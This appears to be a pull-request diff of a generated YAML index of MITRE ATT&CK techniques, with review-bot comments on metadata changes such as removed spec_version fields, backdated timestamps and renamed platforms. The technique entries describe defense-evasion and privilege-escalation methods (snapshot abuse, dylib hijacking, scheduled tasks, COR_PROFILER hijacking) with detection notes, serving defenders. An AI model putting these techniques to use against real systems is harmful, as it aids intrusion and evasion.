- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -15907,6 +16158,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -15915,20 +16169,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
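Review bot: The `- spec_version: '2.1'` removal here (and in every later object in this patch) leaves the objects without the field STIX 2.1 requires on each SDO, and together with the timestamp regressions elsewhere it reads as the generator having switched STIX data sources; if that is intentional, the PR description should say so and confirm the index consumer never validates the objects as STIX 2.1. In the same hunk the bump from `x_mitre_attack_spec_version: 2.1.0` to `3.2.0` drops `x_mitre_permissions_required`, which is expected for 3.x, but `x_mitre_version: '1.2'` and the new `x_mitre_platforms` block are emitted at a different position than the keys they replace, so a stable key sort in the generator would make future diffs far smaller.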
@@ -15985,6 +16270,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -15995,13 +16281,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -16060,11 +16345,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -16104,8 +16388,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -16113,13 +16399,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
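Review bot: The platform rename in this hunk (`Azure AD`, `Office 365`, `Google Workspace` replaced by `Identity Provider`, `Office Suite`) means any per-platform index file keyed on the old names will no longer match this technique; those indexes need to be regenerated or retired in the same change rather than left carrying stale entries. Also, `x_mitre_modified_by_ref` is inserted here while the identical line is deleted further down in the next hunk, which is the same key-ordering noise as above and worth fixing at the generator level.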
@@ -16150,9 +16436,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1480.001:
@@ -16213,7 +16496,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
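Review bot: `modified` moves backwards here, from `'2022-05-24T14:00:00.188Z'` to `'2022-05-04T14:52:51.290Z'`, and the same pattern repeats across the patch (`T14:00:00.188Z` values replaced by earlier, non-round timestamps), so these are not edits to the technique but a change in which upstream timestamp is being copied; anyone diffing `modified` to detect technique changes will see false positives, and the PR description should state the source switch so the regression is not mistaken for data corruption.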
@@ -16235,11 +16518,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -16306,8 +16588,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -16325,7 +16607,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -16428,12 +16709,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -16446,6 +16726,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -16482,17 +16763,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -16538,9 +16819,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -16578,7 +16856,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -16597,7 +16875,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -16628,7 +16905,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -16652,12 +16929,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -16741,7 +17016,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -16763,7 +17037,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -16797,12 +17071,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -16854,9 +17126,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges - MacOS
@@ -16983,7 +17254,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -17030,7 +17300,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -17043,12 +17313,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
@@ -17127,7 +17398,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -17149,7 +17420,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -17192,7 +17462,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -17216,8 +17486,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -17265,7 +17533,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -17303,8 +17571,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -17353,7 +17619,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -17405,29 +17671,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
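Review bot: The added sentence about `Invoke-CimMethod` and the `PS_ScheduledTask` WMI class is cited to `Red Canary - Atomic Red Team`, which is this repository, so the index now cites itself as the authority for a technique description; that is upstream ATT&CK text and nothing in the hunk should be altered, but it is worth knowing the reference resolves back here rather than to an independent source. The pre-existing `can not` (for `cannot`) in the unchanged context line is likewise upstream and should be reported there, not patched locally.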
@@ -17474,7 +17739,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -17506,8 +17771,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
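Review bot: The URL here is rewritten from `twitter.com` to `x.com` with a new retrieval date while `source_name: Twitter Leoloobeek Scheduled Task` keeps the old name; keeping the source_name is right, since it is the citation key used in descriptions, but because the host changed once already it would be more durable to also carry an archived snapshot URL, as the subt0x10 reference in this same patch does with its `web.archive.org` link.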
@@ -17521,6 +17786,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -17533,11 +17802,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
@@ -17603,7 +17875,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -17692,7 +17963,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -17780,7 +18050,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -17865,7 +18134,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -17897,7 +18165,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -17920,11 +18188,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
